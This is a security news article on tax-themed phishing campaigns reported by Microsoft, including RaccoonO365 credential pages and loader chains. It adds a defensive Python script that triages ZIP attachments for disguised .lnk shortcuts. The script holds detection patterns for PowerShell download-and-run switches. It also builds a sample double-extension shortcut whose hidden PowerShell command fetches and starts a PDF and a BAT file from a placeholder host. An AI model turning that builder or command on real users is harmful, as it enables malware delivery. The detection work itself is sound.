Microsoft Warns of Tax-Themed Phishing Campaigns Deploying Malware and Credential Theft Tools

As tax season approaches, Microsoft is raising alarms over a series of phishing campaigns that use tax-related themes to distribute malware, steal credentials, and gain unauthorized access to corporate environments. The attacks chain URL redirections, abuse legitimate services, and lean on phishing-as-a-service (PhaaS) platforms to evade detection.

Campaign Overview: Tax Season as a Cybercrime Opportunity

The latest campaigns identified by Microsoft use PDF attachments, URL shorteners, and QR codes to lure victims onto phishing websites. Many of these pages are served by a platform dubbed RaccoonO365, a PhaaS service first identified in December 2024 that clones Microsoft 365 login pages so that users enter their real credentials into the attacker's form.

Alongside credential phishing, the same campaigns deliver malware including:

  • Remcos RAT

  • Latrodectus

  • AHKBot

  • GuLoader

  • BruteRatel C4 (BRc4)

Notable Campaigns and Tactics

Campaign 1: Fake DocuSign and Remote Malware Deployment

On February 6, 2025, Microsoft observed a campaign targeting hundreds of U.S.-based users with PDF attachments that redirected victims to fake DocuSign pages via shortened URLs (e.g., Rebrandly). Users who clicked the link and passed the attackers' filtering checks, based on system and IP address, were served a JavaScript file that started a multi-stage chain:

  • The JavaScript downloaded a Microsoft Software Installer (MSI) package

  • The MSI installed the BruteRatel C4 (BRc4) post-exploitation framework

  • BRc4 then deployed Latrodectus as the follow-on payload

Users who did not meet the criteria for further infection were served a benign PDF instead, which keeps sandboxes and analysts from seeing the malicious branch.

This activity has been attributed to Storm-0249, a known initial access broker previously associated with malware families like Emotet, IcedID, BazaLoader, and Bumblebee.

Campaign 2: QR Code-Based Phishing at Scale

Between February 12 and 28, 2025, Microsoft observed another wave of phishing emails targeting over 2,300 organizations across engineering, IT, and consulting sectors. These emails contained:

  • No text in the body

  • A PDF attachment with a QR code

  • Links to phishing pages hosted on RaccoonO365

The aim: harvest Microsoft 365 credentials through realistic login page clones.

Expanding Threats: AHKBot and GuLoader

Additional tax-themed phishing emails are delivering other malware strains, including AHKBot and GuLoader:

  • AHKBot Campaign: Redirects users to a malicious Excel file that asks them to enable macros. If macros are enabled, the file downloads an MSI payload that launches an AutoHotKey script, followed by:

    • A screenshot-capture (Screenshotter) module

    • Exfiltration of the captured screenshots to a remote server

  • GuLoader Campaign: Sends PDF attachments containing URLs that download a ZIP file with .lnk (shortcut) files posing as tax documents. These files:

    • Launch PowerShell

    • Download a PDF and BAT file

    • Install GuLoader, which drops Remcos RAT
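The GuLoader chain above hinges on a ZIP attachment whose .lnk files are named to look like tax documents while actually launching PowerShell. The following is an added example, not code from Microsoft or Cyber Syrup, of how a mail-gateway or triage script can surface that trick: it parses the Shell Link (.lnk) binary format (header, LinkFlags, and the StringData fields) to recover each shortcut's target and command-line arguments, then flags double extensions, script hosts, and download-or-execute arguments. The archive, the shortcut, the file names, and the example.invalid URLs are all constructed in memory for the demonstration; nothing here is taken from a real sample.

```python
"""Triage a ZIP attachment for Windows shortcut (.lnk) lures.

Added example for this post, not code from Microsoft or Cyber Syrup.
It parses the Shell Link (.lnk) header and StringData section to recover
the shortcut's target and command-line arguments, where a lure such as
"Tax_Return_2024.pdf.lnk" hides its PowerShell launcher, and reports why
each shortcut looks suspicious. The ZIP, the .lnk and the example.invalid
URLs below are constructed in memory purely for the demonstration.
"""
import io
import re
import struct
import zipfile

# Shell Link header: HeaderSize 0x4C and CLSID {00021401-0000-0000-C000-000000000046}
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which optional structures follow the header
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

SCRIPT_HOSTS = re.compile(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32", re.I)
DOWNLOAD_OR_RUN = re.compile(
    r"-e(nc(odedcommand)?)?\b|-w(indowstyle)?\s+hidden|downloadstring|downloadfile|"
    r"invoke-webrequest|\biwr\b|\biex\b|invoke-expression|bitsadmin|certutil|https?://",
    re.I)
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def is_lnk(data: bytes) -> bool:
    """True if the bytes start with a valid Shell Link header (checked by content, not name)."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields present in the shortcut, decoded per the IsUnicode flag."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:          # LinkTargetIDList: 2-byte IDListSize, then that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfo: 4-byte LinkInfoSize that counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, key in STRING_FIELDS:  # each: 2-byte character count, then the string, no terminator
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if unicode else count
            fields[key] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
            pos += nbytes
    return fields


def triage_zip(zip_bytes: bytes) -> list:
    """List every shortcut in the archive together with the reasons it looks like a lure."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name, data = info.filename, zf.read(info)
            lower = name.lower()
            if not lower.endswith(".lnk") and not is_lnk(data):
                continue                       # ordinary member, not a shortcut by name or content
            finding = {"file": name, "command": "", "reasons": []}
            if not is_lnk(data):
                finding["reasons"].append("named .lnk but has no Shell Link header")
                findings.append(finding)
                continue
            stem = lower[:-4] if lower.endswith(".lnk") else lower
            if stem.endswith(DOCUMENT_EXTS):
                finding["reasons"].append("double extension: shortcut posing as a document")
            fields = parse_lnk(data)
            args = fields.get("arguments", "")
            finding["command"] = (fields.get("relative_path", "") + " " + args).strip()
            if SCRIPT_HOSTS.search(finding["command"]):
                finding["reasons"].append("target is a script host or LOLBin")
            if DOWNLOAD_OR_RUN.search(args):
                finding["reasons"].append("arguments download or run code")
            findings.append(finding)
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk carrying only RelativePath and Arguments (sample data only)."""
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<I", HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE))
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))  # attributes, times, size, icon, showcmd, hotkey, reserved

    def field(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + field(relative_path) + field(arguments)


def build_sample_zip() -> bytes:
    """Constructed sample mimicking the chain in the post: a .pdf.lnk whose PowerShell fetches a PDF and a BAT."""
    args = ('-NoProfile -WindowStyle Hidden -Command "iwr http://example.invalid/irs/f1040.pdf '
            '-OutFile $env:TEMP\\f1040.pdf; iwr http://example.invalid/irs/up.bat '
            '-OutFile $env:TEMP\\up.bat; Start-Process $env:TEMP\\f1040.pdf; Start-Process $env:TEMP\\up.bat"')
    lnk = build_lnk("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", args)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Tax_Return_2024.pdf.lnk", lnk)                     # the lure
        zf.writestr("Cover_Letter.txt", "Please review the attached return.")  # harmless member
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f["file"], f["reasons"], f["command"][:80])
```

The check keys on the file's magic bytes rather than its name, so a shortcut renamed to hide the .lnk suffix is still parsed, and a file named .lnk that is not a Shell Link is reported separately. Real shortcuts usually carry the target in the LinkTargetIDList and LinkInfo structures rather than RelativePath; the parser skips both by their declared sizes, so the StringData offsets stay correct either way, but a production tool would also decode the IDList to recover the absolute target path.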

Related Activity: Fake Windows Installers and Social Engineering

Recent reports also reveal:

  • Fake Windows 11 Pro downloads promoted through Facebook ads, leading to Latrodectus and BRc4 infections

  • New Latrodectus 1.9 variant with scheduled tasks and improved command execution

  • Use of QR codes and open redirect links to obscure phishing URLs

  • Exploitation of trusted services (e.g., Dropbox, DocuSign, Canva, Zoho) to evade email security

Broader Trends: Phishing Innovation Across Platforms

In recent weeks, threat actors have employed a variety of tactics, including:

  • Browser-in-the-Browser (BitB) attacks to harvest Steam credentials

  • SVG-based emails to bypass spam filters

  • Impersonation of music services like Spotify and Apple Music

  • Fake security alerts to trick users into revealing system credentials

  • Trojanized software installers distributing Gh0st RAT and DarkCloud

  • Localized banking-themed phishing targeting companies in Romania and Spain

How to Stay Protected

To defend against these evolving threats, Microsoft and cybersecurity experts recommend:

  • Implementing phishing-resistant authentication, such as FIDO2 security keys or certificate-based sign-in; these bind the credential to the legitimate site's origin, so a RaccoonO365-style clone of the Microsoft 365 login page cannot capture anything replayable

  • Using modern browsers with built-in phishing and reputation protection

  • Blocking access to known malicious domains via DNS filtering or endpoint protection, and blocking the URL shorteners and redirectors the campaigns rely on where business need allows

  • Training users to treat unexpected tax-themed links, QR codes, shortcut (.lnk) files, and macro-enabled spreadsheets as suspicious

  • Monitoring for unusual sign-in activity across Microsoft 365 and other platforms, such as logins from new locations or devices shortly after a phishing email was delivered

Final Thoughts

As attackers continue to weaponize tax season, the use of PhaaS platforms, social engineering, and malware loaders poses a significant risk to organizations. By adopting modern security practices and remaining vigilant, businesses can better defend against these highly targeted campaigns.